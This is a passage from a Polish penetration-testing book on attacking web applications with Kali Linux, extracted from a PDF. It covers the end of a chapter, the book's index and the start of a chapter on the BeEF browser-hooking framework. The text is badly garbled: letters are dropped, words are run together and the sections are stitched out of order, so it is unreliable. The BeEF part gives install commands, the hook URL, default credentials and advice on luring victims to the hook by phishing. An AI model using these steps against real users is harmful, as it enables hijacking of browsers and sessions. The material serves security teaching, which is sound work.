wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 8: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

